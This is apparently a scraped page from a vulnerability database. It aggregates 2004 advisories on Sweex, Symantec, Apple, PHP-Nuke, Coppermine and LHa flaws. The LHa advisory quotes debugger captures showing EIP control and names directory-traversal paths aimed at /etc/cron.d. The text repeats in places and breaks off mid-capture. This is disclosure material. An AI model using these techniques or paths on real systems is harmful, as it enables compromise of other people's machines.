VARIoT IoT vulnerabilities database

Sweex Wireless Broadband Router/Accesspoint 802.11g (LC000060) allows remote attackers to obtain sensitive information and gain privileges by using TFTP to download the nvram file, then extracting the username, password, and other data from the file. It has been reported that Sweex Wireless Broadband Router/Access Point is prone to a vulnerability that may allow a remote attacker to gain unauthorized access to a vulnerable access point. It has been reported that the access point has a TFTP service running that is enabled by default. Successful exploitation of this issue may allow a remote attacker to gain access to sensitive information that could eventually allow an attacker to completely compromise the access point. Sweex Wireless Broadband Router/Access Point 11g is reported to be prone to this issue. TITLE: Sweex Wireless Broadband Router Exposure of Configuration SECUNIA ADVISORY ID: SA11603 VERIFY ADVISORY: http://secunia.com/advisories/11603/ CRITICAL: Moderately critical IMPACT: Exposure of system information, Exposure of sensitive information WHERE: >From local network OPERATING SYSTEM: Sweex Wireless Broadband Router/ Acces Point 11g DESCRIPTION: Mark Janssen has reported a vulnerability in Sweex Wireless Broadband Router/Accesspoint, allowing malicious people to gain knowledge of the configuration. This allows anyone with access to the network to download configuration files, including a file containing usernames and passwords. Reportedly, the tftp service can't be disabled. Other Sweex products may also be affected. SOLUTION: Do not use the device on networks with untrusted users. PROVIDED AND/OR DISCOVERED BY: Mark Janssen ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet@packetstormsecurity.org ----------------------------------------------------------------------

Agnitum Outpost Pro Firewall 2.1 allows remote attackers to cause a denial of service (CPU consumption) via a flood of small, invalid packets, which can not be processed quickly enough by Outpost Pro. The issue is reported to present itself when an attacker sends multiple incomplete requests to the application. Agnitum Outpost Pro Firewall version 2.1 is reported to be affected by this issue, however, prior versions may be vulnerable as well. The problem is that the firewall fails to handle incomplete requests fast enough, if they are made at a high speed with random source IPs. This causes the firewall to stop processing packets in real time. SOLUTION: Use another product if this causes problems. PROVIDED AND/OR DISCOVERED BY: Armin Pelkmann ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet@packetstormsecurity.org ----------------------------------------------------------------------

DHCP on Linksys BEFSR11, BEFSR41, BEFSR81, and BEFSRU31 Cable/DSL Routers, firmware version 1.45.7, does not properly clear previously used buffer contents in a BOOTP reply packet, which allows remote attackers to obtain sensitive information. Linksys has a variety of network equipment product lines.  Multiple Linksys devices have problems processing DHCP messages. Remote attackers can use this vulnerability to obtain sensitive information or conduct denial of service attacks on the device.  The built-in DHCP server of these devices has a security vulnerability. The DHCP server of these devices incorrectly processes BOOTP packets. When returning a BOOTP response, it fills some of the information in the memory into the BOOTP field, so the attacker can gain sensitivity by sniffing network communications. Information can also lead to a denial of service attack on the device by an attacker. When attempting to exploit this issue, it has been reported that a denial of service condition may occur, stopping legitimate users from using the device

The Clear Channel Assessment (CCA) algorithm in the IEEE 802.11 wireless protocol, when using DSSS transmission encoding, allows remote attackers to cause a denial of service via a certain RF signal that causes a channel to appear busy (aka "jabber"), which prevents devices from transmitting data. IEEE of 802.11 wireless protocol Exists in unspecified vulnerabilities.None. This issue is due to a design error that might cause an affected device to stop transmitting network data through wireless mediums. This issue is reported to affect only wireless hardware devices that implement IEEE 802.11 using a DSSS physical layer

Multiple vulnerabilities in SYMDNS.SYS for Symantec Norton Internet Security and Professional 2002 through 2004, Norton Personal Firewall 2002 through 2004, Norton AntiSpam 2004, Client Firewall 5.01 and 5.1.1, and Client Security 1.0 through 2.0 allow remote attackers to cause a denial of service or execute arbitrary code via (1) a manipulated length byte in the first-level decoding routine for NetBIOS Name Service (NBNS) that modifies an index variable and leads to a stack-based buffer overflow, (2) a heap-based corruption problem in an NBNS response that is missing certain RR fields, and (3) a stack-based buffer overflow in the DNS component via a Resource Record (RR) with a long canonical name (CNAME) field composed of many smaller components. There is a heap corruption vulnerability in multiple Symantec firewall products in which attempts to process a specially crafted NetBIOS Name Service (NBNS) response packet could allow an unauthenticated, remote attacker to execute arbitrary code with kernel privileges. client firewall , client security , norton antispam An unspecified vulnerability exists in multiple Symantec products, including:None. The issue is due to insufficient bounds checking of DNS response data and may be exploited to gain SYSTEM/kernel level access to a computer hosting the vulnerable software. The source of the vulnerability is that the CNAME (Canonical Name) data field specified in incoming DNS Resource Records is copied into an internal buffer in an insecure manner, resulting in a stack-based buffer overflow. As a result, an attacker on a local network could respond to a NetBIOS Name Service query from a client and send a malformed response in return that overflows a vulnerable buffer. A successful attack could allow an attacker to gain SYSTEM level privileges on a vulnerable system. Products driven by SYMDNS.SYS have problems responding to the NetBIOS name service when reading the response data from the packet. After copying these data, the structure of the heap in memory is destroyed. An attacker can construct malicious data and send it to UDP affected by this vulnerability. 137 port, denial of service attacks can occur. It is possible to execute arbitrary commands

The SYMDNS.SYS driver in Symantec Norton Internet Security and Professional 2002 through 2004, Norton Personal Firewall 2002 through 2004, Norton AntiSpam 2004, Client Firewall 5.01 and 5.1.1, and Client Security 1.0 through 2.0 allows remote attackers to cause a denial of service (CPU consumption from infinite loop) via a DNS response with a compressed name pointer that points to itself. There is a heap corruption vulnerability in multiple Symantec firewall products in which attempts to process a specially crafted NetBIOS Name Service (NBNS) response packet could allow an unauthenticated, remote attacker to execute arbitrary code with kernel privileges

Unknown vulnerability related to "the handling of large requests" in RAdmin for Apple Mac OS X 10.3.3 and Mac OS X 10.2.8 may allow attackers to have unknown impact via unknown attack vectors. There is a buffer overflow vulnerability in the way Apple's AppleFileServer handles certain authentication requests. This vulnerability could allow an unauthenticated, remote attacker to execute arbitrary code. Attackers can use unknown attack vectors to cause unknown effects

The Downloads module in Php-Nuke 6.x through 7.2 allows remote attackers to gain sensitive information via an invalid show parameter to modules.php, which reveals the full path in a PHP error message. PHP-Nuke is prone to a information disclosure vulnerability. There is a vulnerability in the download module of Php-Nuke 6.x to 7.2 versions. This vulnerability reveals the full path of PHP error messages

Cross-site scripting (XSS) vulnerability in the Downloads module in Php-Nuke 6.x through 7.2 allows remote attackers to inject arbitrary HTML and web script via the (1) ttitle or (2) sid parameters to modules.php. PHP-Nuke is prone to a cross-site scripting vulnerability

SQL injection vulnerability in the Downloads module in Php-Nuke 6.x through 7.2 allows remote attackers to execute arbitrary SQL via the (1) orderby or (2) sid parameters to modules.php. Multiple SQL vulnerabilities have been identified in the 'modules.php' module of the application. These vulnerabilities may allow a remote attacker to manipulate query logic, potentially leading to unauthorized access to sensitive information. PHPNuke 7.2 and prior are reported to be prone to these issues. The Downloads module for PHP-Nuke is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. PHP-Nuke is a popular website creation and management tool, it can use many database software as backend, such as MySQL, PostgreSQL, mSQL, Interbase, Sybase, etc. The \'\'modules.php\'\' module included in PHP-Nuke lacks adequate filtering of the input submitted by the user, and remote attackers can use this vulnerability to obtain sensitive information of the user. The \'\'modules.php\'\' module lacks filtering for the \"orderby\" and \"sid\" variables submitted by the user. Submitting malicious SQL commands as this variable data can change the original SQL logic and obtain the database sensitive information or change database information

Buffer overflow in the ISAKMP functionality for Check Point VPN-1 and FireWall-1 NG products, before VPN-1/FireWall-1 R55 HFA-03, R54 HFA-410 and NG FP3 HFA-325, or VPN-1 SecuRemote/SecureClient R56, may allow remote attackers to execute arbitrary code during VPN tunnel negotiation. Check Point VPN-1/Firewall-1 Is VPN When negotiating tunnels, ISAKMP There is a vulnerability that does not properly perform boundary checking in the processing part of the protocol.Arbitrary code may be executed. Specifically, a buffer overflow condition may be triggered by sending a malformed ISAKMP packet during the negotiations. Check Point Software user who do not use Remote Access VPNs or gateway-to-gateway VPNs are not vulnerable to this issue. Due to a lack of details, further information cannot be provided at the moment. This BID will be updated as more information becomes available. Check Point Firewall-1 is a high-performance firewall, Checkpoint VPN-1 server and Checkpoint VPN client provide VPN access for remote client computers. The IKE component of these products allows non-directional or bi-directional authentication of two remote peers

Stack-based buffer overflow in AppleFileServer for Mac OS X 10.3.3 and earlier allows remote attackers to execute arbitrary code via a LoginExt packet for a Cleartext Password User Authentication Method (UAM) request with a PathName argument that includes an AFPName type string that is longer than the associated length field. There is a buffer overflow vulnerability in the way Apple's AppleFileServer handles certain authentication requests. This vulnerability could allow an unauthenticated, remote attacker to execute arbitrary code. apple's Apple Mac OS X and Apple Mac OS X Server Exists in unspecified vulnerabilities.None. The issue presents itself when the application receives a 'LoginExt' packet containing a malformed 'PathName' argument. This issue was previously disclosed in a multiple BID 10268 (Apple OS X Multiple Unspecified Large Input Vulnerabilities), however, it is being assigned a new BID as a result of new information available. The problem exists in the pre-authentication stage. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 @stake, Inc. www.atstake.com Security Advisory Advisory Name: AppleFileServer Remote Command Execution Release Date: 05/03/2004 Application: AppleFileServer Platform: MacOS X 10.3.3 and below Severity: A remote attacker can execute arbitrary commands as root Authors: Dave G. <daveg@atstake.com> Dino Dai Zovi <ddaizovi@atstake.com> Vendor Status: Informed, Upgrade Available CVE Candidate: CAN-2004-0430 Reference: www.atstake.com/research/advisories/2004/a050304-1.txt Overview: The AppleFileServer provides Apple Filing Protocol (AFP) services for both Mac OS X and Mac OS X server. AFP is a protocol used to remotely mount drives, similar to NFS or SMB/CIFS. AFP is a protocol used to remotely mount drives, similar to NFS or SMB/CIFS. AFP is not enabled by default. It is enabled through the Sharing Preferences section by selecting the 'Personal File Sharing' checkbox. Thereis a pre-authentication remotely exploitable stack buffer overflow that allows an attacker to obtain administrative privileges. The PathName argument is encoded as one-byte specifying the string type, two-bytes specifying the string length, and finally the string itself. A string of type AFPName (0x3) that is longer than the length declared in the packet will overflow the fixed-size stack buffer. The previously described malformed request results in a trivially exploitable stack buffer overflow. Vendor Response: - From APPLE-SA-2004-05-03 Security Update 2004-05-03 AppleFileServer: Fixes CAN-2004-0430 to improve the handling of long passwords. Credit to Dave G. from @stake for reporting this issue. Security Update 2004-05-03 may be obtained from: * Software Update pane in System Preferences * Apple's Software Downloads web site: For Mac OS X 10.3.3 "Panther" ============================= http://download.info.apple.com/Mac_OS_X/061-1213.20040503.vngr3/ 2Z/SecUpd2004-05-03Pan.dmg The download file is named: "SecUpd2004-05-03Pan.dmg" Its SHA-1 digest is: 6f35539668d80ee536305a4146bd982a93706532 For Mac OS X Server 10.3.3 ========================== http://download.info.apple.com/Mac_OS_X/061-1215.20040503.mPp9k/ 2Z/SecUpdSrvr2004-05-03Pan.dmg The download file is named: "SecUpdSrvr2004-05-03Pan.dmg" Its SHA-1 digest is: 3c7da910601fd36d4cdfb276af4783ae311ac5d7 For Mac OS X 10.2.8 "Jaguar" ============================= http://download.info.apple.com/Mac_OS_X/061-1217.20040503.BmkY5/ 2Z/SecUpd2004-05-03Jag.dmg The download file is named: "SecUpd2004-05-03Jag.dmg" Its SHA-1 digest is: 11d5f365e0db58b369d85aa909ac6209e2f49945 For Mac OS X Server 10.2.8 ========================== http://download.info.apple.com/Mac_OS_X/061-1219.20040503.Zsw3S/ 2Z/SecUpdSrvr2004-05-03Jag.dmg The download file is named: "SecUpdSrvr2004-05-03Jag.dmg" Its SHA-1 digest is: 28859a4c88f6e1d1fe253388b233a5732b6e42fb Timeline 3/26/2004 Vendor notified of issue 5/04/2004 Vendor informs us that they have a patch available 4/04/2004 Advisory released Recommendation: If you do not need AFS, disable it. If you do need it, upgrade to the latest version of Panther. Common Vulnerabilities and Exposures (CVE) Information: The Common Vulnerabilities and Exposures (CVE) project has assigned the following names to these issues. These are candidates for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems. CAN-2004-0430 AppleFileServer Remote Command Execution Open Source Vulnerability Database (OSVDB) Information: More information available at www.osvdb.org OSVDB ID 5762 @stake Vulnerability Reporting Policy: http://www.atstake.com/research/policy/ @stake Advisory Archive: http://www.atstake.com/research/advisories/ PGP Key: http://www.atstake.com/research/pgp_key.asc Copyright 2004 @stake, Inc. All rights reserved. -----BEGIN PGP SIGNATURE----- Version: PGP 8.0.3 iQA/AwUBQJbHKUe9kNIfAm4yEQJraQCgvzJSUEBfxJNS5Yrk8tCFoM+7vCsAn0WI aBZDr4XgtWYb05rrBQKn01f2 =A6ex -----END PGP SIGNATURE-----

Unknown vulnerability in CoreFoundation in Mac OS X 10.3.3 and Mac OS X 10.3.3 Server, related to "the handling of an environment variable," has unknown attack vectors and unknown impact. There is a buffer overflow vulnerability in the way Apple's AppleFileServer handles certain authentication requests. This vulnerability could allow an unauthenticated, remote attacker to execute arbitrary code. It has been reported that CoreFoundation is affected by a local unspecified large input vulnerability. This issue is apparently due to an inability of certain library-defined classes to handle large input. Currently sufficient information does not exist to provide more details. This BID will be updated when more information becomes available. This issue was previously disclosed in a multiple BID 10268 (Apple OS X Multiple Unspecified Large Input Vulnerabilities), however, it is being assigned a new BID

Coppermine Photo Gallery 1.2.2b and 1.2.0 RC4 allows remote attackers to obtain sensitive information via a direct HTTP request to (1) phpinfo.php, (2) addpic.php, (3) config.php, (4) db_input.php, (5) displayecard.php, (6) ecard.php, (7) crop.inc.php, which reveal the full path in a PHP error message. Coppermine Photo Gallery is prone to a information disclosure vulnerability

Cross-site scripting (XSS) vulnerability in menu.inc.php in Coppermine Photo Gallery 1.2.2b allows remote attackers to inject arbitrary HTML or web script via the CPG_URL parameter. Coppermine Photo Gallery is a WEB-based graphics library management program. Coppermine Photo Gallery does not fully filter the input submitted by users in many places. Remote attackers can use these vulnerabilities to execute arbitrary commands, obtain COOKIE data, and obtain sensitive file paths and other information. The specific issues are as follows: 1. Path leakage: By directly accessing some configuration scripts, sensitive path information can be obtained. 2. Cross-site scripting attack coppermine/docs/menu.inc.php\'\' lacks filtering for user submitted URIs, attackers can use this vulnerability to obtain sensitive information. 3. Browse any directory: If you have PHP-Nuke administrator privileges, you can bypass directory restrictions to access other files by accessing the coppermine module. 4. Arbitrary command execution: If you have PHP-Nuke administrator privileges to access the coppermine module, you can enter the SHELL command in some parameters of the coppermine configuration panel, and execute it with WEB process privileges

Multiple directory traversal vulnerabilities in LHA 1.14 allow remote attackers or local users to create arbitrary files via an LHA archive containing filenames with (1) .. sequences or (2) absolute pathnames with double leading slashes ("//absolute/path"). The first issues reported have been assigned the CVE candidate identifier (CAN-2004-0234). LHA is reported prone to two stack-based buffer-overflow vulnerabilities. An attacker may exploit these vulnerabilities to execute supplied instructions with the privileges of the user who invoked the affected LHA utility. The second set of issues has been assigned CVE candidate identifier (CAN-2004-0235). In addition to the buffer-overflow vulnerabilities that were reported, LHA has been reported prone to several directory-traversal issues. An attacker may likely exploit these directory-traversal vulnerabilities to corrupt/overwrite files in the context of the user who is running the affected LHA utility. **NOTE: Reportedly, this issue may also cause a denial-of-service condition in the ClearSwift MAILsweeper products due to code dependency. **Update: Many F-Secure Anti-Virus products are also reported prone to the buffer-overflow vulnerability. LHa is a console-based decompression program. Carefully constructed file or directory names can execute arbitrary commands with process privileges. Attackers can build simple packages that corrupt system files when LHA operates. ------------------------------------------------------------------------ LHa buffer overflows and directory traversal problems PROGRAM: LHa (Unix version) VENDOR: various people VULNERABLE VERSIONS: 1.14d to 1.14i 1.17 (Linux binary) possibly others IMMUNE VERSIONS: 1.14i with my patch applied 1.14h with my patch applied LHa 1.14: http://www2m.biglobe.ne.jp/~dolphin/lha/lha.htm http://www2m.biglobe.ne.jp/~dolphin/lha/prog/ LHa 1.17: http://www.infor.kanazawa-it.ac.jp/~ishii/lhaunix/ REFERENCES: CAN-2004-0234 (buffer overflows) CAN-2004-0235 (directory traversal) * DESCRIPTION * LHa is a console-based program for packing and unpacking LHarc archives. It is one of the packages in Red Hat Linux, Fedora Core, SUSE Linux, Debian GNU/Linux (non-free), Mandrakelinux, Slackware Linux, Gentoo Linux, Yellow Dog Linux, Conectiva Linux and ALT Linux. It is also included in the port/package collections for FreeBSD, OpenBSD and NetBSD. * OVERVIEW * LHa has two stack-based buffer overflows and two directory traversal problems. They can be abused by malicious people in many different ways: some mail virus scanners require LHa and run it automatically on attached files in e-mail messages. Some web applications allow uploading and unpacking of LHarc archives. Some people set up their web browsers to start LHa automatically after downloading an LHarc archive. Finally, social engineering is probably quite effective in this case. * TECHNICAL DETAILS * a) two stack-based buffer overflows The buffer overflows in LHa occur when testing (t) or extracting (x) archives where the archive contents have too long filenames or directory names. The cause of the problem is the function get_header() in header.c. This function first reads the lengths of filenames or directory names from the archive, and then it reads that many bytes to a char array (one for filenames and one for directory names) without checking if the array is big enough. By exploiting this bug, you get control over several registers including EIP, as you can see in this session capture: $ lha t buf_oflow.lha LHa: Error: Unknown information UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUU Segmentation fault $ lha x buf_oflow.lha LHa: Error: Unknown information UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUU Segmentation fault $ gdb lha GNU gdb Red Hat Linux (5.3post-0.20021129.18rh) Copyright 2003 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-redhat-linux-gnu"... (gdb) r x buf_oflow.lha Starting program: /usr/bin/lha x buf_oflow.lha LHa: Error: Unknown information UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUU Program received signal SIGSEGV, Segmentation fault. 0x55555555 in ?? () (gdb) bt #0 0x55555555 in ?? () Cannot access memory at address 0x55555555 (gdb) i r eax 0x4001e4a0 1073865888 ecx 0xffffffe0 -32 edx 0x24 36 ebx 0x55555555 1431655765 esp 0xbfffdd50 0xbfffdd50 ebp 0x55555555 0x55555555 esi 0x55555555 1431655765 edi 0x55555555 1431655765 eip 0x55555555 0x55555555 eflags 0x210282 2163330 cs 0x23 35 ss 0x2b 43 ds 0x2b 43 es 0x2b 43 fs 0x0 0 gs 0x33 51 (gdb) r t buf_oflow.lha The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /usr/bin/lha t buf_oflow.lha LHa: Error: Unknown information UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUU Program received signal SIGSEGV, Segmentation fault. 0x55555555 in ?? () (gdb) bt #0 0x55555555 in ?? () Cannot access memory at address 0x55555555 (gdb) i r eax 0x4001e4a0 1073865888 ecx 0xffffffe0 -32 edx 0x24 36 ebx 0x55555555 1431655765 esp 0xbfffe6d0 0xbfffe6d0 ebp 0x55555555 0x55555555 esi 0x55555555 1431655765 edi 0x55555555 1431655765 eip 0x55555555 0x55555555 eflags 0x210286 2163334 cs 0x23 35 ss 0x2b 43 ds 0x2b 43 es 0x2b 43 fs 0x0 0 gs 0x33 51 (gdb) q The program is running. Exit anyway? (y or n) y $ b) two directory traversal problems LHa has directory traversal problems, both with absolute paths and relative paths. There is no protection against relative paths at all, so you can simply use the lha binary to create an archive with paths like "../../../../../etc/cron.d/evil". There is some simple protection against absolute paths, namely skipping the first character if it is a slash, but again you can simply use the binary to create archives with paths like "//etc/cron.d/evil". * ATTACHED FILES * I have written a patch against version 1.14i that corrects all four problems. The patch is included as an attachment, together with some test archives. * TIMELINE * 18 Apr: contacted the vendor-sec list and the LHa 1.14 author 18 Apr: tried to contact the LHa 1.17 author with a web form and a guessed e-mail address which bounced 19 Apr: reply from the vendor-sec list with CVE references 30 Apr: Red Hat released their advisory 01 May: I release this advisory // Ulf Harnhammar Advogato diary :: http://www.advogato.org/person/metaur/ idiosynkratisk (Swedish electropop zine) :: http://idiosynkratisk.tk/ Debian Security Audit Project :: http://shellcode.org/Audit/ ------------------------------------------------------------------------

picmgmtbatch.inc.php in Coppermine Photo Gallery 1.2.2b and 1.2.0 RC4 allows remote attackers with administrative privileges to execute arbitrary commands via shell metacharacters in the (1) $CONFIG['impath'] or (2) $CONFIG['jpeg_qual'] parameters. These issues occur because the application fails to properly sanitize and validate user-supplied input before using it in dynamic content and in function calls that execute system commands. Attackers may exploit these issues to steal cookie-based authentication credentials, map the application root directory of the affected application, execute arbitrary commands, and include arbitrary files. Other attacks are also possible. Coppermine Photo Gallery is a WEB-based graphics library management program. Coppermine Photo Gallery does not fully filter the input submitted by users in many places. The specific issues are as follows: 1. Path leakage: By directly accessing some configuration scripts, sensitive path information can be obtained. 2. Cross-site scripting attack coppermine/docs/menu.inc.php\'\' lacks filtering for user submitted URIs, attackers can use this vulnerability to obtain sensitive information. 3. Browse any directory: If you have PHP-Nuke administrator privileges, you can bypass directory restrictions to access other files by accessing the coppermine module. 4

PHP remote file inclusion vulnerability in init.inc.php in Coppermine Photo Gallery 1.2.0 RC4 allows remote attackers to execute arbitrary PHP code by modifying the CPG_M_DIR to reference a URL on a remote web server that contains functions.inc.php. Coppermine Photo Gallery is reported prone to multiple input-validation vulnerabilities, some of which may lead to arbitrary command execution. These issues occur because the application fails to properly sanitize and validate user-supplied input before using it in dynamic content and in function calls that execute system commands. Attackers may exploit these issues to steal cookie-based authentication credentials, map the application root directory of the affected application, execute arbitrary commands, and include arbitrary files. Other attacks are also possible. Coppermine Photo Gallery is a WEB-based graphics library management program. Coppermine Photo Gallery does not fully filter the input submitted by users in many places. The specific issues are as follows: 1. Path leakage: By directly accessing some configuration scripts, sensitive path information can be obtained. 2. Cross-site scripting attack coppermine/docs/menu.inc.php\'\' lacks filtering for user submitted URIs, attackers can use this vulnerability to obtain sensitive information. 3. Browse any directory: If you have PHP-Nuke administrator privileges, you can bypass directory restrictions to access other files by accessing the coppermine module. 4. Arbitrary command execution: If you have PHP-Nuke administrator privileges to access the coppermine module, you can enter the SHELL command in some parameters of the coppermine configuration panel, and execute it with WEB process privileges

PHP remote file inclusion vulnerability in theme.php in Coppermine Photo Gallery 1.2.2b allows remote attackers to execute arbitrary PHP code by modifying the THEME_DIR parameter to reference a URL on a remote web server that contains user_list_info_box.inc. Coppermine Photo Gallery is reported prone to multiple input-validation vulnerabilities, some of which may lead to arbitrary command execution. These issues occur because the application fails to properly sanitize and validate user-supplied input before using it in dynamic content and in function calls that execute system commands. Attackers may exploit these issues to steal cookie-based authentication credentials, map the application root directory of the affected application, execute arbitrary commands, and include arbitrary files. Other attacks are also possible. Coppermine Photo Gallery is a WEB-based graphics library management program. Coppermine Photo Gallery does not fully filter the input submitted by users in many places. The specific issues are as follows: 1. Path leakage: By directly accessing some configuration scripts, sensitive path information can be obtained. 2. Cross-site scripting attack coppermine/docs/menu.inc.php\'\' lacks filtering for user submitted URIs, attackers can use this vulnerability to obtain sensitive information. 3. Browse any directory: If you have PHP-Nuke administrator privileges, you can bypass directory restrictions to access other files by accessing the coppermine module. 4. Arbitrary command execution: If you have PHP-Nuke administrator privileges to access the coppermine module, you can enter the SHELL command in some parameters of the coppermine configuration panel, and execute it with WEB process privileges

Multiple stack-based buffer overflows in the get_header function in header.c for LHA 1.14, as used in products such as Barracuda Spam Firewall, allow remote attackers or local users to execute arbitrary code via long directory or file names in an LHA archive, which triggers the overflow when testing or extracting the archive. The first issues reported have been assigned the CVE candidate identifier (CAN-2004-0234). LHA is reported prone to two stack-based buffer-overflow vulnerabilities. An attacker may exploit these vulnerabilities to execute supplied instructions with the privileges of the user who invoked the affected LHA utility. The second set of issues has been assigned CVE candidate identifier (CAN-2004-0235). In addition to the buffer-overflow vulnerabilities that were reported, LHA has been reported prone to several directory-traversal issues. An attacker may likely exploit these directory-traversal vulnerabilities to corrupt/overwrite files in the context of the user who is running the affected LHA utility. **NOTE: Reportedly, this issue may also cause a denial-of-service condition in the ClearSwift MAILsweeper products due to code dependency. **Update: Many F-Secure Anti-Virus products are also reported prone to the buffer-overflow vulnerability. LHa is a console-based decompression program. Carefully constructed file or directory names can execute arbitrary commands with process privileges. Attackers can build simple packages that corrupt system files when LHA operates. These vulnerabilities are related to: SA11510 SA19002 Successful exploitation allows execution of arbitrary code. ------------------------------------------------------------------------ LHa buffer overflows and directory traversal problems PROGRAM: LHa (Unix version) VENDOR: various people VULNERABLE VERSIONS: 1.14d to 1.14i 1.17 (Linux binary) possibly others IMMUNE VERSIONS: 1.14i with my patch applied 1.14h with my patch applied LHa 1.14: http://www2m.biglobe.ne.jp/~dolphin/lha/lha.htm http://www2m.biglobe.ne.jp/~dolphin/lha/prog/ LHa 1.17: http://www.infor.kanazawa-it.ac.jp/~ishii/lhaunix/ REFERENCES: CAN-2004-0234 (buffer overflows) CAN-2004-0235 (directory traversal) * DESCRIPTION * LHa is a console-based program for packing and unpacking LHarc archives. It is one of the packages in Red Hat Linux, Fedora Core, SUSE Linux, Debian GNU/Linux (non-free), Mandrakelinux, Slackware Linux, Gentoo Linux, Yellow Dog Linux, Conectiva Linux and ALT Linux. It is also included in the port/package collections for FreeBSD, OpenBSD and NetBSD. * OVERVIEW * LHa has two stack-based buffer overflows and two directory traversal problems. They can be abused by malicious people in many different ways: some mail virus scanners require LHa and run it automatically on attached files in e-mail messages. Some web applications allow uploading and unpacking of LHarc archives. Some people set up their web browsers to start LHa automatically after downloading an LHarc archive. Finally, social engineering is probably quite effective in this case. The cause of the problem is the function get_header() in header.c. This function first reads the lengths of filenames or directory names from the archive, and then it reads that many bytes to a char array (one for filenames and one for directory names) without checking if the array is big enough. By exploiting this bug, you get control over several registers including EIP, as you can see in this session capture: $ lha t buf_oflow.lha LHa: Error: Unknown information UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU UUUUUUUUUUUUU Segmentation fault $ lha x buf_oflow.lha LHa: Error: Unknown information UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU 